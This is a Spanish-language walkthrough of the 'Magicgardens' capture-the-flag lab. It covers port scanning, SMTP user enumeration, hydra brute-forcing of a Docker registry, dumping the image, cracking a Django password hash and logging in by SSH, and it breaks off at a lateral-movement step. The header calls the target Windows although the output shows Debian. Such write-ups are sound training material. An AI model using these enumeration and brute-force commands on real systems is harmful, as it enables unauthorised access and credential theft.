Magicgardens

OS: Windows
Dificultad: Insane
Puntos: 50

Nmap

nmap -v -p 22,25,80,1337,5000 -sV -sC -nO namp.txt --min-rate=5000 10.129.93.221
Nmap scan report for 10.129.93.221
Host is up (0.14s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 e0:72:62:48:99:33:4f:fc:59:f8:6c:05:59:db:a7:7b (ECDSA)
|_  256 62:c6:35:7e:82:3e:b1:0f:9b:6f:5b:ea:fe:c5:85:9a (ED25519)
25/tcp   open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp   open  http     nginx 1.22.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://magicgardens.htb/
|_http-server-header: nginx/1.22.1
1337/tcp open  waste?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, TerminalServer, TerminalServerCookie, X11Probe, afp, giop, ms-sql-s: 
|_    [x] Handshake error
5000/tcp open  ssl/http Docker Registry (API: 2.0)
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Issuer: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-23T11:57:43
| Not valid after:  2024-05-22T11:57:43
| MD5:   2f97:8372:17ae:abe4:a4d9:5937:f438:3e71
|_SHA-1: a6f9:ce07:c808:150a:00aa:f193:1b72:a963:f414:f57c
|_http-title: Site doesn't have a title.
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

Enumeration

Enumeramos usuarios a traves del servicio smtp utilizando metasploit.

https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#automatic-tools

msfconsole
use auxiliary/scanner/smtp/smtp_enum
set rhosts magicgardens.htb
set user_file /usr/share/seclists/Usernames/Names/names.txt
run

Con la lista de usuario por default encontramos los siguientes usuarios.

[+] 10.129.93.221:25      - 10.129.93.221:25 Users found: , _apt, avahi-autoipd, backup, bin, daemon, games, irc, list, lp, mail, man, messagebus, news, nobody, postfix, postmaster, proxy, sshd, sync, sys, systemd-network, uucp, www-data

Utilizando una lista de usuarios de seclists encontramos el siguiente usuario valido.

[+] 10.129.93.221:25      - 10.129.93.221:25 Users found: alex

BruteForce Docker registry

Tambien tenemos el puerto 5000 que es un docker registry. Actualmente contamos con un usario pero no con el password por lo tanto haremos fuerza bruta.

https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force#docker-registry

hydra -l alex  -P /usr/share/wordlists/rockyou.txt 10.129.93.221 -s 5000 https-get /v2/
[DATA] attacking http-gets://10.129.93.221:5000/v2/
[5000][http-get] host: 10.129.93.221   login: alex   password: diamonds
1 of 1 target successfully completed, 1 valid password found

Docker Registry Enumeration

Ahora podemos acceder al registro.

┌──(root㉿kali)-[~/htb/MagicGardens]
└─# curl -k -u alex:diamonds https://10.129.93.221:5000/v2/_catalog
{"repositories":["magicgardens.htb"]}

┌──(root㉿kali)-[~/htb/MagicGardens]
└─# curl -k -u alex:diamonds https://10.129.93.221:5000/v2/magicgardens.htb/tags/list
{"name":"magicgardens.htb","tags":["1.3"]}

Lo que haremos sera descargar el repositorio pero primero tenemos que hacer algunas modificaciones. Creamos el archivo daemon.json y ponemos lo siguiente.

/etc/docker/daemon.json
{
    "insecure-registries": ["10.129.93.221:5000"]
}

Reiniciamos el servicio.

┌──(root㉿kali)-[~/htb/MagicGardens]
└─# systemctl restart docker.service

Ahora nos autenticamos.

┌──(root㉿kali)-[~/htb/MagicGardens]
└─# docker login --username=alex 10.129.93.221:5000
Password: 
WARNING! Your password will be stored unencrypted in /root/.docker/config.json.
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/#credentials-store

Login Succeeded

Descargamos la imagen.

┌──(root㉿kali)-[~/htb/MagicGardens]
└─# docker pull 10.129.93.221:5000/magicgardens.htb:1.3
1.3: Pulling from magicgardens.htb
de4cac68b616: Pull complete 
d31b0195ec5f: Pull complete 
9b1fd34c30b7: Pull complete

Accedemos a la imagen.

┌──(root㉿kali)-[~/htb/MagicGardens]
└─# docker run -it 10.129.93.221:5000/magicgardens.htb:1.3 bash

Extra

Tambien podemos descargar la informacion con el siguiente script.

https://github.com/Syzik/DockerRegistryGrabber

┌──(root㉿kali)-[~/htb/MagicGardens/DockerRegistryGrabber]
└─# python3 drg.py https://10.129.93.221 -U alex -P diamonds --dump 'magicgardens.htb'
[+] BlobSum found 30
[+] Dumping magicgardens.htb
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : b0c11cc482abe59dbeea1133c92720f7a3feca9c837d75fd76936b1c6243938c
    [+] Downloading : 748da8c1b87e668267b90ea305e2671b22d046dcfeb189152bf590d594c3b3fc

Los archivos se encuentran en b0c11cc482abe59dbeea1133c92720f7a3feca9c837d75fd76936b1c6243938c.

Django Crack Hash

En los archivos se encuentra db.sqlite3, revisando los registros conseguimos un hash de que es posible romper utilizando hashcat.

┌──(root㉿kali)-[~/htb/MagicGardens]
└─# hashcat -m 10000 hash.txt /usr/share/wordlists/rockyou.txt

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

pbkdf2_sha256$600000$y1tAjUmiqLtSdpL2wL3h56$61u2yMfK3oYgnL31fX8R4k/0hTc6YXRfiOH4LYVsEXo=:jonasbrothers

Podemos acceder al portal de admin.

http://magicgardens.htb/admin/
morty : jonasbrothers

Tambien podemos conectarnos por SSH.

┌──(root㉿kali)-[~/htb/MagicGardens/DockerRegistryGrabber]
└─# ssh morty@10.129.93.221
morty@10.129.93.221's password: 
Linux magicgardens 6.1.0-20-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.85-1 (2024-04-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 22 12:27:10 2024 from 10.10.14.218
morty@magicgardens:~$ id
uid=1001(morty) gid=1001(morty) groups=1001(morty)
morty@magicgardens:~$

Lateral Movement

scp morty@10.129.93.221:/usr/local/bin/harvest .
/tmp/rust_mozprofile4JM7iP/storage/ls-archive.sqlite
/var/lib/postfix/smtp_scache.db